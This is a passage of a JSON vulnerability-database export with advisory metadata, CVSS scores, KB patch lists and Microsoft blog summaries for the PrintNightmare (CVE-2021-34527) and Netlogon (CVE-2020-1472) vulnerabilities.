Version 1809 for x64-based Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-34527](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-34527>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2021-34527](<https://vulners.com/cve/CVE-2021-34527>)9.0Critical\n\n### *KB list*:\n[5004948](<http://support.microsoft.com/kb/5004948>) \n[5004945](<http://support.microsoft.com/kb/5004945>) \n[5004958](<http://support.microsoft.com/kb/5004958>) \n[5004954](<http://support.microsoft.com/kb/5004954>) \n[5004950](<http://support.microsoft.com/kb/5004950>) \n[5004956](<http://support.microsoft.com/kb/5004956>) \n[5004960](<http://support.microsoft.com/kb/5004960>) \n[5004947](<http://support.microsoft.com/kb/5004947>) \n[5005575](<http://support.microsoft.com/kb/5005575>) \n[5007215](<http://support.microsoft.com/kb/5007215>) \n[5008212](<http://support.microsoft.com/kb/5008212>) \n[5018427](<http://support.microsoft.com/kb/5018427>) \n[5019959](<http://support.microsoft.com/kb/5019959>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T00:00:00", "type": "kaspersky", "title": "KLA12213 RCE vulnerability in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2023-06-14T00:00:00", "id": "KLA12213", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12213/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "msrc": [{"lastseen": "2023-05-23T15:35:29", "description": "On Tuesday July 6, 2021, Microsoft issued CVE-2021-34527 regarding a Windows Print Spooler vulnerability. Updates were released on July 6 and 7 which addressed the vulnerability for all supported Windows versions. We encourage customers to update as soon as possible. CVE-2021-34527 - Windows Print Spooler Remote Code Execution Vulnerability. Following the out of band release (OOB) we investigated claims regarding the effectiveness of the security update and questions around the suggested mitigations.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-08T07:00:00", "type": "msrc", "title": "Clarified Guidance for CVE-2021-34527 Windows Print Spooler Vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-08T07:00:00", "id": "MSRC:D3EB0B723121A9028F60C06787605F29", "href": "/blog/2021/07/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T17:06:18", "description": "2021 \u5e74 7 \u6708 7 \u65e5 (\u65e5\u672c\u6642\u9593)\u3001\u30de\u30a4\u30af\u30ed\u30bd\u30d5\u30c8\u306f\u4ee5\u4e0b\u306e\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\u306e\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u66f4\u65b0\u30d7\u30ed\u30b0\u30e9\u30e0\u3092\u5b9a\u4f8b\u5916\u3067\u516c", "cvss3": {}, "published": "2021-07-06T07:00:00", "type": "msrc", "title": "Windows Print Spooler \u306e\u8106\u5f31\u6027\u60c5\u5831 (CVE-2021-34527) \u306b\u5bfe\u3059\u308b\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u66f4\u65b0\u30d7\u30ed\u30b0\u30e9\u30e0\u306e\u5b9a\u4f8b\u5916\u3067\u306e\u516c\u958b", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-06T07:00:00", "id": "MSRC:90189138D61770FDBFA4D6BFCF043C7F", "href": "/blog/2021/07/20210707_windowsprintspooleroob/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-22T16:39:48", "description": "Today Microsoft released an Out-of-Band (OOB) security update for CVE-2021-34527, which is being discussed externally as PrintNightmare. This is a cumulative update release, so it contains all previous security fixes and should be applied immediately to fully protect your systems. The fix that we released today fully addresses the public vulnerability, and it also includes a new feature that allows customers to implement stronger protections.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-06T07:00:00", "type": "msrc", "title": "Out-of-Band (OOB) Security Update available for CVE-2021-34527", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-06T07:00:00", "id": "MSRC:7A4C48432D99E285A3DCFB40C66B7041", "href": "https://msrc.microsoft.com/blog/2021/07/out-of-band-oob-security-update-available-for-cve-2021-34527/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T15:35:29", "description": "2021 \u5e74 7 \u6708 7 \u65e5 (\u65e5\u672c\u6642\u9593) \u306b\u3001\u30de\u30a4\u30af\u30ed\u30bd\u30d5\u30c8\u306f Windows Print Spooler \u306e\u8106\u5f31\u6027\u60c5\u5831 CVE-2021-34527 \u3092\u516c\u958b\u3057\u30017 \u6708 7 \u65e5\u3068 8 \u65e5 (\u65e5\u672c\u6642\u9593)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-08T07:00:00", "type": "msrc", "title": "Windows Print Spooler \u306e\u8106\u5f31\u6027\u60c5\u5831 (CVE-2021-34527) \u306b\u95a2\u3059\u308b\u304a\u5ba2\u69d8\u5411\u3051\u30ac\u30a4\u30c0\u30f3\u30b9", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-08T07:00:00", "id": "MSRC:236F052536DCDE6A90F408B759E221BC", "href": "/blog/2021/07/20210709_guidancecve202134527/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-22T16:39:48", "description": "On Tuesday July 6, 2021, Microsoft issued CVE-2021-34527 regarding a Windows Print Spooler vulnerability. Updates were released on July 6 and 7 which addressed the vulnerability for all supported Windows versions. We encourage customers to update as soon as possible. CVE-2021-34527 - Windows Print Spooler Remote Code Execution Vulnerability. Following the out of band release (OOB) we investigated claims regarding the effectiveness of the security update and questions around the suggested mitigations.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-08T07:00:00", "type": "msrc", "title": "Clarified Guidance for CVE-2021-34527 Windows Print Spooler Vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-08T07:00:00", "id": "MSRC:138C696A39E258DD773C8941F8F90E86", "href": "https://msrc.microsoft.com/blog/2021/07/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:38:15", "description": "Today Microsoft released an Out-of-Band (OOB) security update for CVE-2021-34527, which is being discussed externally as PrintNightmare. This is a cumulative update release, so it contains all previous security fixes and should be applied immediately to fully protect your systems. The fix that we released today fully addresses the public vulnerability, and it also includes a new feature that allows customers to implement stronger protections. See: KB5005010: \u2026\n\n[ Out-of-Band (OOB) Security Update available for CVE-2021-34527 Read More \u00bb](<https://msrc-blog.microsoft.com/2021/07/06/out-of-band-oob-security-update-available-for-cve-2021-34527/>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-06T23:36:00", "type": "msrc", "title": "Out-of-Band (OOB) Security Update available for CVE-2021-34527", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-06T23:36:00", "id": "MSRC:CB3C49E52425E7C1B0CFB151C6D488A4", "href": "https://msrc-blog.microsoft.com/2021/07/06/out-of-band-oob-security-update-available-for-cve-2021-34527/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:38:15", "description": "On Tuesday July 6, 2021, Microsoft issued CVE-2021-34527 regarding a Windows Print Spooler vulnerability. Updates were released on July 6 and 7 which addressed the vulnerability for all supported Windows versions. We encourage customers to update as soon as possible. CVE-2021-34527 - Windows Print Spooler Remote Code Execution Vulnerability. Following the out of band release \u2026\n\n[ Clarified Guidance for CVE-2021-34527 Windows Print Spooler Vulnerability Read More \u00bb](<https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-09T01:00:42", "type": "msrc", "title": "Clarified Guidance for CVE-2021-34527 Windows Print Spooler Vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-09T01:00:42", "id": "MSRC:239E65C8BEB88185329D9990C80B10DF", "href": "https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T15:35:29", "description": "Today Microsoft released an Out-of-Band (OOB) security update for CVE-2021-34527, which is being discussed externally as PrintNightmare. This is a cumulative update release, so it contains all previous security fixes and should be applied immediately to fully protect your systems. The fix that we released today fully addresses the public vulnerability, and it also includes a new feature that allows customers to implement stronger protections.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-06T07:00:00", "type": "msrc", "title": "Out-of-Band (OOB) Security Update available for CVE-2021-34527", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-06T07:00:00", "id": "MSRC:8DDE6C6C2CBC080233B7C0F929E83062", "href": "/blog/2021/07/out-of-band-oob-security-update-available-for-cve-2021-34527/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-29T21:40:29", "description": "Microsoft has received a small number of reports from customers and others about continued activity exploiting a vulnerability affecting the Netlogon protocol (CVE-2020-1472) which was previously addressed in security updates starting on August 11, 2020. If the original guidance is not applied, the vulnerability could allow an attacker to spoof a domain controller account that could be \u2026\n\n[ Attacks exploiting Netlogon vulnerability (CVE-2020-1472) Read More \u00bb](<https://msrc-blog.microsoft.com/2020/10/29/attacks-exploiting-netlogon-vulnerability-cve-2020-1472/>)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-10-29T20:02:19", "type": "msrc", "title": "Attacks exploiting Netlogon vulnerability (CVE-2020-1472)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-10-29T20:02:19", "id": "MSRC:96F2FB0D77EED0ABDED8EBD64AEBEA09", "href": "https://msrc-blog.microsoft.com/2020/10/29/attacks-exploiting-netlogon-vulnerability-cve-2020-1472/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-22T16:39:48", "description": "Microsoft has received a small number of reports from customers and others about continued activity exploiting a vulnerability affecting the Netlogon protocol (CVE-2020-1472) which was previously addressed in security updates starting on August 11, 2020. If the original guidance is not applied, the vulnerability could allow an attacker to spoof a domain controller account that could be used to steal domain credentials and take over the domain.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-29T07:00:00", "type": "msrc", "title": "Attacks exploiting Netlogon vulnerability (CVE-2020-1472)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-10-29T07:00:00", "id": "MSRC:6EA997A78BB548DC0178952394874CE2", "href": "https://msrc.microsoft.com/blog/2020/10/attacks-exploiting-netlogon-vulnerability-cve-2020-1472/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-22T16:39:48", "description": "Microsoft addressed a Critical RCE vulnerability affecting the Netlogon protocol (CVE-2020-1472) on August 11, 2020. We are reminding our customers that beginning with the February 9, 2021 Security Update release we will be enabling Domain Controller enforcement mode by default. This will block vulnerable connections from non-compliant devices. DC enforcement mode requires that all Windows and non-Windows devices use secure RPC with Netlogon secure channel unless customers have explicitly allowed the account to be vulnerable by adding an exception for the non-compliant device.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-01-14T08:00:00", "type": "msrc", "title": "Netlogon Domain Controller Enforcement Mode is enabled by default beginning with the February 9, 2021 Security Update, related to CVE-2020-1472", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-01-14T08:00:00", "id": "MSRC:35A18F0B9DCC4126DC5EC19296034C33", "href": "https://msrc.microsoft.com/blog/2021/01/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T14:43:31", "description": "Microsoft addressed a Critical RCE vulnerability affecting the Netlogon protocol (CVE-2020-1472) on August 11, 2020. We are reminding our customers that beginning with the February 9, 2021 Security Update release we will be enabling Domain Controller enforcement mode by default. This will block vulnerable connections from non-compliant devices. DC enforcement mode requires that all Windows and non-Windows devices use secure RPC with Netlogon secure channel unless customers have explicitly allowed the account to be vulnerable by adding an exception for the non-compliant device.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-01-14T08:00:00", "type": "msrc", "title": "Netlogon Domain Controller Enforcement Mode is enabled by default beginning with the February 9, 2021 Security Update, related to CVE-2020-1472", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-01-14T08:00:00", "id": "MSRC:617BB0BF7CDA5777BFA2E81C8277D73C", "href": "/blog/2021/01/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T14:43:31", "description": "Microsoft has received a small number of reports from customers and others about continued activity exploiting a vulnerability affecting the Netlogon protocol (CVE-2020-1472) which was previously addressed in security updates starting on August 11, 2020. If the original guidance is not applied, the vulnerability could allow an attacker to spoof a domain controller account that could be used to steal domain credentials and take over the domain.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-29T07:00:00", "type": "msrc", "title": "Attacks exploiting Netlogon vulnerability (CVE-2020-1472)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-10-29T07:00:00", "id": "MSRC:93A361B73FFA3EEFB6825C56F25103BB", "href": "/blog/2020/10/attacks-exploiting-netlogon-vulnerability-cve-2020-1472/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-15T02:37:55", "description": "Microsoft addressed a Critical RCE vulnerability affecting the Netlogon protocol (CVE-2020-1472) on August 11, 2020. We are reminding our customers that beginning with the February 9, 2021 Security Update release we will be enabling Domain Controller enforcement mode by default. This will block vulnerable connections from non-compliant devices. DC enforcement mode requires that all Windows and non-Windows devices use secure RPC with Netlogon secure channel unless customers have explicitly allowed the account to be vulnerable by adding an exception for the \u2026\n\n[ Netlogon Domain Controller Enforcement Mode is enabled by default beginning with the February 9, 2021 Security Update, related to CVE-2020-1472 Read More \u00bb](<https://msrc-blog.microsoft.com/2021/01/14/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/>)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-01-15T02:31:56", "type": "msrc", "title": "Netlogon Domain Controller Enforcement Mode is enabled by default beginning with the February 9, 2021 Security Update, related to CVE-2020-1472", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-01-15T02:31:56", "id": "MSRC:5B84BD451283462DC81D4090EFE66280", "href": "https://msrc-blog.microsoft.com/2021/01/14/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T17:06:18", "description": "2020 \u5e74 8 \u6708\u306e\u6708\u4f8b\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u66f4\u65b0\u30d7\u30ed\u30b0\u30e9\u30e0 (2020 \u5e74 8 \u6708 11 \u65e5 \u516c\u958b (\u7c73\u56fd\u6642\u9593)) \u306b\u3066\u3001Active Directory \u3067\u5229\u7528\u3055\u308c", "cvss3": {}, "published": "2020-09-14T07:00:00", "type": "msrc", "title": "[AD 